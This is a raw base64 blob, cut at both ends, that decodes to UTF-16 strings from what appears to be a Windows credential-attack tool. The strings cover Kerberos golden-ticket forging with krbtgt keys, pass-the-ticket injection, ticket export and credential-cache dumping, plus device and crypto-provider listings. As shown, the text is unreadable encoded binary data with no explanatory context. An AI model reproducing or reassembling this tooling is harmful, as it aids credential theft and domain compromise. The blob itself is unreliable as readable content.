BsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAHAAdAB0AF8AZgBpAGwAZQAgADsAIABrAHUAbABsAF8AbQBfAGYAaQBsAGUAXwByAGUAYQBkAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AcAB0AHQAXwBkAGEAdABhACAAOwAgAEwAcwBhAEMAYQBsAGwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFAAYQBjAGsAYQBnAGUAIABLAGUAcgBiAFMAdQBiAG0AaQB0AFQAaQBjAGsAZQB0AE0AZQBzAHMAYQBnAGUAIAAvACAAUABhAGMAawBhAGcAZQAgADoAIAAlADAAOAB4AAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAHAAdAB0AF8AZABhAHQAYQAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBTAHUAYgBtAGkAdABUAGkAYwBrAGUAdABNAGUAcwBzAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAAAAAABUAGkAYwBrAGUAdAAoAHMAKQAgAHAAdQByAGcAZQAgAGYAbwByACAAYwB1AHIAcgBlAG4AdAAgAHMAZQBzAHMAaQBvAG4AIABpAHMAIABPAEsACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBwAHUAcgBnAGUAIAA7ACAATABzAGEAQwBhAGwAbABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AUABhAGMAawBhAGcAZQAgAEsAZQByAGIAUAB1AHIAZwBlAFQAaQBjAGsAZQB0AEMAYQBjAGgAZQBNAGUAcwBzAGEAZwBlACAALwAgAFAAYQBjAGsAYQBnAGUAIAA6ACAAJQAwADgAeAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBwAHUAcgBnAGUAIAA7ACAATABzAGEAQwBhAGwAbABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AUABhAGMAawBhAGcAZQAgAEsAZQByAGIAUAB1AHIAZwBlAFQAaQBjAGsAZQB0AEMAYQBjAGgAZQBNAGUAcwBzAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAAAASwBlAHIAYgBlAHIAbwBzACAAVABHAFQAIABvAGYAIABjAHUAcgByAGUAbgB0ACAAcwBlAHMAcwBpAG8AbgAgADoAIAAAAAAACgAKAAkAKgAqACAAUwBlAHMAcwBpAG8AbgAgAGsAZQB5ACAAaQBzACAATgBVAEwATAAhACAASQB0ACAAbQBlAGEAbgBzACAAYQBsAGwAbwB3AHQAZwB0AHMAZQBzAHMAaQBvAG4AawBlAHkAIABpAHMAIABuAG8AdAAgAHMAZQB0ACAAdABvACAAMQAgACoAKgAKAAAAAABuAG8AIAB0AGkAYwBrAGUAdAAgACEACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AdABnAHQAIAA7ACAATABzAGEAQwBhAGwAbABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AUABhAGMAawBhAGcAZQAgAEsAZQByAGIAUgBlAHQAcgBpAGUAdgBlAFQAaQBjAGsAZQB0AE0AZQBzAHMAYQBnAGUAIAAvACAAUABhAGMAawBhAGcAZQAgADoAIAAlADAAOAB4AAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAHQAZwB0ACAAOwAgAEwAcwBhAEMAYQBsAGwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFAAYQBjAGsAYQBnAGUAIABLAGUAcgBiAFIAZQB0AHIAaQBlAHYAZQBUAGkAYwBrAGUAdABNAGUAcwBzAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAAAAZQB4AHAAbwByAHQAAAAAAAoAWwAlADAAOAB4AF0AIAAtACAAMAB4ACUAMAA4AHgAIAAtACAAJQBzAAAACgAgACAAIABTAHQAYQByAHQALwBFAG4AZAAvAE0AYQB4AFIAZQBuAGUAdwA6ACAAAAAAACAAOwAgAAAACgAgACAAIABTAGUAcgB2AGUAcgAgAE4AYQBtAGUAIAAgACAAIAAgACAAIAA6ACAAJQB3AFoAIABAACAAJQB3AFoAAAAAAAAACgAgACAAIABDAGwAaQBlAG4AdAAgAE4AYQBtAGUAIAAgACAAIAAgACAAIAA6ACAAJQB3AFoAIABAACAAJQB3AFoAAAAKACAAIAAgAEYAbABhAGcAcwAgACUAMAA4AHgAIAAgACAAIAA6ACAAAAAAAGsAaQByAGIAaQAAAAoAIAAgACAAKgAgAFMAYQB2AGUAZAAgAHQAbwAgAGYAaQBsAGUAIAAgACAAIAAgADoAIAAlAHMAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AbABpAHMAdAAgADsAIABrAHUAbABsAF8AbQBfAGYAaQBsAGUAXwB3AHIAaQB0AGUARABhAHQAYQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBsAGkAcwB0ACAAOwAgAEwAcwBhAEMAYQBsAGwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFAAYQBjAGsAYQBnAGUAIABLAGUAcgBiAFIAZQB0AHIAaQBlAHYAZQBFAG4AYwBvAGQAZQBkAFQAaQBjAGsAZQB0AE0AZQBzAHMAYQBnAGUAIAAvACAAUABhAGMAawBhAGcAZQAgADoAIAAlADAAOAB4AAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGwAaQBzAHQAIAA7ACAATABzAGEAQwBhAGwAbABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AUABhAGMAawBhAGcAZQAgAEsAZQByAGIAUgBlAHQAcgBpAGUAdgBlAEUAbgBjAG8AZABlAGQAVABpAGMAawBlAHQATQBlAHMAcwBhAGcAZQAgADoAIAAlADAAOAB4AAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AbABpAHMAdAAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBRAHUAZQByAHkAVABpAGMAawBlAHQAQwBhAGMAaABlAEUAeAAyAE0AZQBzAHMAYQBnAGUAIAAvACAAUABhAGMAawBhAGcAZQAgADoAIAAlADAAOAB4AAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AbABpAHMAdAAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBRAHUAZQByAHkAVABpAGMAawBlAHQAQwBhAGMAaABlAEUAeAAyAE0AZQBzAHMAYQBnAGUAIAA6ACAAJQAwADgAeAAKAAAAAAB0AGsAdAAAAG4AbwBjAGEAYwBoAGUAAAB0AGEAcgBnAGUAdAAAAAAAcgBjADQAAABkAGUAcwAAAGEAZQBzADIANQA2AAAAAABhAGUAcwAxADIAOAAAAAAAQQBzAGsAaQBuAGcAIABmAG8AcgA6ACAAJQB3AFoACgAAAAAAIAAgACAAKgAgAFQAaQBjAGsAZQB0ACAARQBuAGMAcgB5AHAAdABpAG8AbgAgAFQAeQBwAGUAIAAmACAAawB2AG4AbwAgAG4AbwB0ACAAcgBlAHAAcgBlAHMAZQBuAHQAYQB0AGkAdgBlACAAYQB0ACAAcwBjAHIAZQBlAG4ACgAAAAAAAAAAACAAIAAgACoAIABOAG8AQwBhAGMAaABlADoAIABlAHgAcABvAHIAdABlAGQAIAB0AGkAYwBrAGUAdAAgAG0AYQB5ACAAdgBhAHIAeQAgAHcAaQB0AGgAIABpAG4AZgBvAHIAbQBhAHQAaQBvAG4AcwAgAGEAdAAgAHMAYwByAGUAZQBuAAoAAAAKACAAIAAgACoAIABUAEsAVAAgAHQAbwAgAGYAaQBsAGUAIAAgACAAIAAgACAAIAA6ACAAJQBzAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBhAHMAawAgADsAIABrAHUAbABsAF8AbQBfAGYAaQBsAGUAXwB3AHIAaQB0AGUARABhAHQAYQAgACgAMAB4ACUAMAA4AHgAKQAKAAAACgAgACAAIAAqACAASwBpAFIAQgBpACAAdABvACAAZgBpAGwAZQAgACAAIAAgACAAOgAgACUAcwAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AYQBzAGsAIAA7ACAATABzAGEAQwBhAGwAbABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AUABhAGMAawBhAGcAZQAgAEsAZQByAGIAUgBlAHQAcgBpAGUAdgBlAEUAbgBjAG8AZABlAGQAVABpAGMAawBlAHQATQBlAHMAcwBhAGcAZQAgAC8AIABQAGEAYwBrAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AYQBzAGsAIAA7ACAATABzAGEAQwBhAGwAbABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AUABhAGMAawBhAGcAZQAgAEsAZQByAGIAUgBlAHQAcgBpAGUAdgBlAEUAbgBjAG8AZABlAGQAVABpAGMAawBlAHQATQBlAHMAcwBhAGcAZQAgADoAIAAlADAAOAB4AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBhAHMAawAgADsAIAAnACUAdwBaACcAIABLAGUAcgBiAGUAcgBvAHMAIABuAGEAbQBlACAAbgBvAHQAIABmAG8AdQBuAGQAIQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBhAHMAawAgADsAIABBAHQAIABsAGUAYQBzAHQAIAAvAHQAYQByAGcAZQB0ACAAYQByAGcAdQBtAGUAbgB0ACAAaQBzACAAcgBlAHEAdQBpAHIAZQBkACAAKABlAGcAOgAgAC8AdABhAHIAZwBlAHQAOgBjAGkAZgBzAC8AcwBlAHIAdgBlAHIALgBsAGEAYgAuAGwAbwBjAGEAbAApAAoAAAAAACUAdQAtACUAMAA4AHgALQAlAHcAWgBAACUAdwBaAC0AJQB3AFoALgAlAHMAAAAAACUAMAA4AHgALQAlAHcAWgBAACUAdwBaAC0AJQB3AFoALgAlAHMAAAAlADAAOAB4AC0AbgBvAG4AYQBtAGUALgAlAHMAAAAAAHQAaQBjAGsAZQB0AC4AawBpAHIAYgBpAAAAAAB0AGkAYwBrAGUAdAAAAAAAYQBkAG0AaQBuAAAAdQBzAGUAcgAAAAAAawByAGIAdABnAHQAAAAAAHMAZQByAHYAaQBjAGUAAABpAGQAAAAAAHIAbwBkAGMAAAAAAGcAcgBvAHUAcABzAAAAAABzAGkAZABzAAAAAABjAGwAYQBpAG0AcwAAAAAAMAAAAHMAdABhAHIAdABvAGYAZgBzAGUAdAAAADUAMgA1ADYAMAAwADAAAABlAG4AZABpAG4AAAByAGUAbgBlAHcAbQBhAHgAAAAAAFUAcwBlAHIAIAAgACAAIAAgACAAOgAgACUAcwAKAEQAbwBtAGEAaQBuACAAIAAgACAAOgAgACUAcwAgACgAJQBzACkACgBTAEkARAAgACAAIAAgACAAIAAgADoAIAAlAHMACgBVAHMAZQByACAASQBkACAAIAAgADoAIAAlAHUACgAAAEcAcgBvAHUAcABzACAASQBkACAAOgAgACoAAAAlAHUAIAAAAAoARQB4AHQAcgBhACAAUwBJAEQAcwA6ACAAAAAKAEMAbABhAGkAbQBzACAAIAAgACAAOgAKAAAACgBTAGUAcgB2AGkAYwBlAEsAZQB5ADoAIAAAACAALQAgACUAcwAKAAAAAABTAGUAcgB2AGkAYwBlACAAIAAgADoAIAAlAHMACgAAAFQAYQByAGcAZQB0ACAAIAAgACAAOgAgACUAcwAKAAAATABpAGYAZQB0AGkAbQBlACAAIAA6ACAAAAAAACoAKgAgAFAAYQBzAHMAIABUAGgAZQAgAFQAaQBjAGsAZQB0ACAAKgAqAAAALQA+ACAAVABpAGMAawBlAHQAIAA6ACAAJQBzAAoACgAAAAAACgBHAG8AbABkAGUAbgAgAHQAaQBjAGsAZQB0ACAAZgBvAHIAIAAnACUAcwAgAEAAIAAlAHMAJwAgAHMAdQBjAGMAZQBzAHMAZgB1AGwAbAB5ACAAcwB1AGIAbQBpAHQAdABlAGQAIABmAG8AcgAgAGMAdQByAHIAZQBuAHQAIABzAGUAcwBzAGkAbwBuAAoAAAAAAAoARgBpAG4AYQBsACAAVABpAGMAawBlAHQAIABTAGEAdgBlAGQAIAB0AG8AIABmAGkAbABlACAAIQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgAgADsAIAAKAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAHcAcgBpAHQAZQBEAGEAdABhACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGcAbwBsAGQAZQBuACAAOwAgAEIAZQByAEEAcABwAF8ASwByAGIAQwByAGUAZAAgAGUAcgByAG8AcgAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgAgADsAIABLAHIAYgB0AGcAdAAgAGsAZQB5ACAAcwBpAHoAZQAgAGwAZQBuAGcAdABoACAAbQB1AHMAdAAgAGIAZQAgACUAdQAgACgAJQB1ACAAYgB5AHQAZQBzACkAIABmAG8AcgAgACUAcwAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgAgADsAIABVAG4AYQBiAGwAZQAgAHQAbwAgAGwAbwBjAGEAdABlACAAQwByAHkAcAB0AG8AUwB5AHMAdABlAG0AIABmAG8AcgAgAEUAVABZAFAARQAgACUAdQAgACgAZQByAHIAbwByACAAMAB4ACUAMAA4AHgAKQAgAC0AIABBAEUAUwAgAG8AbgBsAHkAIABhAHYAYQBpAGwAYQBiAGwAZQAgAG8AbgAgAE4AVAA2AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgAgADsAIABNAGkAcwBzAGkAbgBnACAAawByAGIAdABnAHQAIABrAGUAeQAgAGEAcgBnAHUAbQBlAG4AdAAgACgALwByAGMANAAgAG8AcgAgAC8AYQBlAHMAMQAyADgAIABvAHIAIAAvAGEAZQBzADIANQA2ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AIAA7ACAAUwBJAEQAIABzAGUAZQBtAHMAIABpAG4AdgBhAGwAaQBkACAALQAgAEMAbwBuAHYAZQByAHQAUwB0AHIAaQBuAGcAUwBpAGQAVABvAFMAaQBkACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AIAA7ACAATQBpAHMAcwBpAG4AZwAgAFMASQBEACAAYQByAGcAdQBtAGUAbgB0AAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGcAbwBsAGQAZQBuACAAOwAgAEQAbwBtAGEAaQBuACAAbgBhAG0AZQAgAGQAbwBlAHMAIABuAG8AdAAgAGwAbwBvAGsAIABsAGkAawBlACAAYQAgAEYAUQBEAE4ACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGcAbwBsAGQAZQBuACAAOwAgAE0AaQBzAHMAaQBuAGcAIABkAG8AbQBhAGkAbgAgAGEAcgBnAHUAbQBlAG4AdAAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgAgADsAIABNAGkAcwBzAGkAbgBnACAAdQBzAGUAcgAgAGEAcgBnAHUAbQBlAG4AdAAKAAAAIAAqACAAUABBAEMAIABnAGUAbgBlAHIAYQB0AGUAZAAKAAAAIAAqACAAUABBAEMAIABzAGkAZwBuAGUAZAAKAAAAAAAgACoAIABFAG4AYwBUAGkAYwBrAGUAdABQAGEAcgB0ACAAZwBlAG4AZQByAGEAdABlAGQACgAAACAAKgAgAEUAbgBjAFQAaQBjAGsAZQB0AFAAYQByAHQAIABlAG4AYwByAHkAcAB0AGUAZAAKAAAAIAAqACAASwByAGIAQwByAGUAZAAgAGcAZQBuAGUAcgBhAHQAZQBkAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgBfAGQAYQB0AGEAIAA7ACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBlAG4AYwByAHkAcAB0ACAAJQAwADgAeAAKAAAACQAqACAAJQBzACAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGgAYQBzAGgAXwBkAGEAdABhACAAOwAgAEgAYQBzAGgAUABhAHMAcwB3AG8AcgBkACAAOgAgACUAMAA4AHgACgAAAAAAYwBvAHUAbgB0AAAAWAAtAEMAQQBDAEgARQBDAE8ATgBGADoAAAAAAAoAUAByAGkAbgBjAGkAcABhAGwAIAA6ACAAAAAKAAoARABhAHQAYQAgACUAdQAAAAoACQAgACAAIAAqACAASQBuAGoAZQBjAHQAaQBuAGcAIAB0AGkAYwBrAGUAdAAgADoAIAAAAAAACgAJACAAIAAgACoAIABTAGEAdgBlAGQAIAB0AG8AIABmAGkAbABlACAAJQBzACAAIQAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGMAYwBhAGMAaABlAF8AZQBuAHUAbQAgADsAIABrAHUAbABsAF8AbQBfAGYAaQBsAGUAXwB3AHIAaQB0AGUARABhAHQAYQAgACgAMAB4ACUAMAA4AHgAKQAKAAAACgAJACoAIAAlAHcAWgAgAGUAbgB0AHIAeQA/ACAAKgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AYwBjAGEAYwBoAGUAXwBlAG4AdQBtACAAOwAgAGMAYwBhAGMAaABlACAAdgBlAHIAcwBpAG8AbgAgACEAPQAgADAAeAAwADUAMAA0AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBjAGMAYQBjAGgAZQBfAGUAbgB1AG0AIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AcgBlAGEAZABEAGEAdABhACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AYwBjAGEAYwBoAGUAXwBlAG4AdQBtACAAOwAgAEEAdAAgAGwAZQBhAHMAdAAgAG8AbgBlACAAZgBpAGwAZQBuAGEAbQBlACAAaQBzACAAbgBlAGUAZABlAGQACgAAAAAAJQB1AC0AJQAwADgAeAAuACUAcwAAAAAALAAAAD0AAAB8AAAAQwBsAGEAaQBtAHMAWwAlAHUAXQAKAAAAIAAgAFMAbwB1AHIAYwBlAFQAeQBwAGUAOgAgACUAaAB1AAoAAAAAACAAIABFAG4AdAByAGkAZQBzAFsAJQB1AF0ACgAAAAAAIAAgACAAIABJAGQAOgAgACUAcwAKAAAAIAAgACAAIABbAEkATgBUADYANAAgAF0AIAAlAGwAbAAKAAAAIAAgACAAIABbAFUASQBOAFQANgA0AF0AIAAlAHUAbABsAAoAAAAAACAAIAAgACAAWwBTAFQAUgBJAE4ARwBdACAAJQBzAAoAAAAAACAAIAAgACAAWwBCAE8ATwBMACAAIABdACAAJQAwADEANgBsAGwAeAAKAAAAIAAgACAAIABbACEAJQBoAHUAIQBdAAoAAAAAAAoACQAgACAAIABTAHQAYQByAHQALwBFAG4AZAAvAE0AYQB4AFIAZQBuAGUAdwA6ACAAAAAKAAkAIAAgACAAUwBlAHIAdgBpAGMAZQAgAE4AYQBtAGUAIAAAAAAACgAJACAAIAAgAFQAYQByAGcAZQB0ACAATgBhAG0AZQAgACAAAAAAAAoACQAgACAAIABDAGwAaQBlAG4AdAAgAE4AYQBtAGUAIAAgAAAAAAAgACgAIAAlAHcAWgAgACkAAAAAAAoACQAgACAAIABGAGwAYQBnAHMAIAAlADAAOAB4ACAAIAAgACAAOgAgAAAAAAAAAAoACQAgACAAIABTAGUAcwBzAGkAbwBuACAASwBlAHkAIAAgACAAIAAgACAAIAA6ACAAMAB4ACUAMAA4AHgAIAAtACAAJQBzAAAAAAAKAAkAIAAgACAAIAAgAAAAAAAAAAoACQAgACAAIABUAGkAYwBrAGUAdAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAMAB4ACUAMAA4AHgAIAAtACAAJQBzACAAOwAgAGsAdgBuAG8AIAA9ACAAJQB1AAAAAAAJAFsALgAuAC4AXQAAAAAAbgBhAG0AZQBfAGMAYQBuAG8AbgBpAGMAYQBsAGkAegBlAAAAbwBrAF8AYQBzAF8AZABlAGwAZQBnAGEAdABlAAAAAABoAHcAXwBhAHUAdABoAGUAbgB0AAAAAABwAHIAZQBfAGEAdQB0AGgAZQBuAHQAAABpAG4AaQB0AGkAYQBsAAAAcgBlAG4AZQB3AGEAYgBsAGUAAABpAG4AdgBhAGwAaQBkAAAAcABvAHMAdABkAGEAdABlAGQAAABtAGEAeQBfAHAAbwBzAHQAZABhAHQAZQAAAAAAcAByAG8AeAB5AAAAcAByAG8AeABpAGEAYgBsAGUAAABmAG8AcgB3AGEAcgBkAGUAZAAAAGYAbwByAHcAYQByAGQAYQBiAGwAZQAAACgAJQAwADIAaAB1ACkAIAA6ACAAAAAAACUAdwBaACAAOwAgAAAAAAAoAC0ALQApACAAOgAgAAAAQAAgACUAdwBaAAAAbgB1AGwAbAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAAAAZABlAHMAXwBwAGwAYQBpAG4AIAAgACAAIAAgACAAIAAgAAAAZABlAHMAXwBjAGIAYwBfAGMAcgBjACAAIAAgACAAIAAgAAAAZABlAHMAXwBjAGIAYwBfAG0AZAA0ACAAIAAgACAAIAAgAAAAZABlAHMAXwBjAGIAYwBfAG0AZAA1ACAAIAAgACAAIAAgAAAAZABlAHMAXwBjAGIAYwBfAG0AZAA1AF8AbgB0ACAAIAAgAAAAcgBjADQAXwBwAGwAYQBpAG4AIAAgACAAIAAgACAAIAAgAAAAcgBjADQAXwBwAGwAYQBpAG4AMgAgACAAIAAgACAAIAAgAAAAcgBjADQAXwBwAGwAYQBpAG4AXwBlAHgAcAAgACAAIAAgAAAAcgBjADQAXwBsAG0AIAAgACAAIAAgACAAIAAgACAAIAAgAAAAcgBjADQAXwBtAGQANAAgACAAIAAgACAAIAAgACAAIAAgAAAAcgBjADQAXwBzAGgAYQAgACAAIAAgACAAIAAgACAAIAAgAAAAcgBjADQAXwBoAG0AYQBjAF8AbgB0ACAAIAAgACAAIAAgAAAAcgBjADQAXwBoAG0AYQBjAF8AbgB0AF8AZQB4AHAAIAAgAAAAcgBjADQAXwBwAGwAYQBpAG4AXwBvAGwAZAAgACAAIAAgAAAAcgBjADQAXwBwAGwAYQBpAG4AXwBvAGwAZABfAGUAeABwAAAAcgBjADQAXwBoAG0AYQBjAF8AbwBsAGQAIAAgACAAIAAgAAAAcgBjADQAXwBoAG0AYQBjAF8AbwBsAGQAXwBlAHgAcAAgAAAAYQBlAHMAMQAyADgAXwBoAG0AYQBjAF8AcABsAGEAaQBuAAAAYQBlAHMAMgA1ADYAXwBoAG0AYQBjAF8AcABsAGEAaQBuAAAAYQBlAHMAMQAyADgAXwBoAG0AYQBjACAAIAAgACAAIAAgAAAAYQBlAHMAMgA1ADYAXwBoAG0AYQBjACAAIAAgACAAIAAgAAAAdQBuAGsAbgBvAHcAIAAgACAAIAAgACAAIAAgACAAIAAgAAAAdHt7dHtpfXR7aX10ewAAAHt0e3t0e2l9dHsAAH10ewB9fX19AAAAAHR7e3R7e3t0ewAAAH19fX19fQAAfX19AHR7e3R7AAAAfXR7e3R7aX10e299fX10ewAAAAB9AAAAdHt7e3R7aX10ewAAe3t0e2l9dHtvfX19AAAAAG8AAAB9fQAAe3R7aX10e3sAAAAAe3R7aX0AAAB0e2l9AAAAAHR7b319AAAAe3R7aX10e299fQAAcwB0AGEAdAB1AHMAAAAAAHMAaQBuAGcAbABlAAAAAABvAGYAZgAAAHQAZQBzAHQAAAAAAGIAdQBzAHkAbABpAGcAaAB0AAAAQgB1AHMAeQBMAGkAZwBoAHQAIABNAG8AZAB1AGwAZQAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBiAHUAcwB5AGwAaQBnAGgAdABfAG8AZgBmACAAOwAgAE4AbwAgAEIAdQBzAHkATABpAGcAaAB0AAoAAAAAAEkATgBQAFUAVABFAFYARQBOAFQAAAAAAEwASQBHAEgAVAAAAFMATwBVAE4ARAAAAEoASQBOAEcATABFAF8AQwBMAEkAUABTAAAAAABCAHUAcwB5AEwAaQBnAGgAdAAgAGQAZQB0AGUAYwB0AGUAZAAKAAAAAAAAAAoAWwAlADMAdQBdACAAJQBzAAoAIAAgAFYAZQBuAGQAbwByADoAIAAwAHgAJQAwADQAeAAsACAAUAByAG8AZAB1AGMAdAA6ACAAMAB4ACUAMAA0AHgALAAgAFYAZQByAHMAaQBvAG4AOgAgADAAeAAlADAANAB4AAoAIAAgAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgACAAIAA6ACAAJQBzAAoAIAAgAEMAYQBwAGEAYgBpAGwAaQB0AGkAZQBzACAAIAA6ACAAMAB4ACUAMAAyAHgAIAAoACAAAAAlAHMALAAgAAAAAAAgACAARABlAHYAaQBjAGUAIABIAGEAbgBkAGwAZQA6ACAAMAB4ACUAcAAKAAAAAAAgACAAIAAgAFMAdABhAHQAdQBzACAAIAAgACAAIAA6ACAAMAB4ACUAMAAyAHgACgAAAAAAIAAgACAAIABQAHIAbwBkAHUAYwB0AEkAZAAgACAAOgAgACUAUwAKAAAAAAAgACAAIAAgAEMAbwBzAHQAdQBtAGUAcgBJAGQAIAA6ACAAJQBTAAoAAAAAACAAIAAgACAATQBvAGQAZQBsACAAIAAgACAAIAAgADoAIAAlAFMACgAAAAAAIAAgACAAIABTAGUAcgBpAGEAbAAgACAAIAAgACAAOgAgACUAUwAKAAAAAAAgACAAIAAgAE0AZgBnAF8ASQBEACAAIAAgACAAIAA6ACAAJQBTAAoAAAAAACAAIAAgACAATQBmAGcAXwBEAGEAdABlACAAIAAgADoAIAAlAFMACgAAAAAAIAAgACAAIABzAHcAcgBlAGwAZQBhAHMAZQAgACAAOgAgACUAUwAKAAAAAAAgACAASwBlAGUAcABBAGwAaQB2AGUAIABUAGgAcgBlAGEAZAA6ACAAMAB4ACUAcAAgACgAJQB1ACAAbQBzACkACgAgACAAVwBvAHIAawBlAHIAIABUAGgAcgBlAGEAZAAgACAAIAA6ACAAMAB4ACUAcAAgACgAJQB1ACAAbQBzACkACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBiAHUAcwB5AGwAaQBnAGgAdABfAHMAdABhAHQAdQBzACAAOwAgAE4AbwAgAEIAdQBzAHkATABpAGcAaAB0AAoAAABbACUAMwB1AF0AIAAlAHMAIAAoACAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBiAHUAcwB5AGwAaQBnAGgAdABfAGwAaQBzAHQAIAA7ACAATgBvACAAQgB1AHMAeQBMAGkAZwBoAHQACgAAAHMAbwB1AG4AZAAAAGMAbwBsAG8AcgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYgB1AHMAeQBsAGkAZwBoAHQAXwBzAGkAbgBnAGwAZQAgADsAIABOAG8AIABCAHUAcwB5AEwAaQBnAGgAdAAKAAAAcAByAG8AdgBpAGQAZQByAHMAAABMAGkAcwB0ACAAYwByAHkAcAB0AG8AZwByAGEAcABoAGkAYwAgAHAAcgBvAHYAaQBkAGUAcgBzAAAAAABzAHQAbwByAGUAcwAAAAAATABpAHMAdAAgAGMAcgB5AHAAdABvAGcAcgBhAHAAaABpAGMAIABzAHQAbwByAGUAcwAAAGMAZQByAHQAaQBmAGkAYwBhAHQAZQBzAAAAAABMAGkAcwB0ACAAKABvAHIAIABlAHgAcABvAHIAdAApACAAYwBlAHIAdABpAGYAaQBjAGEAdABlAHMAAABrAGUAeQBzAAAAAAAAAAAATABpAHMAdAAgA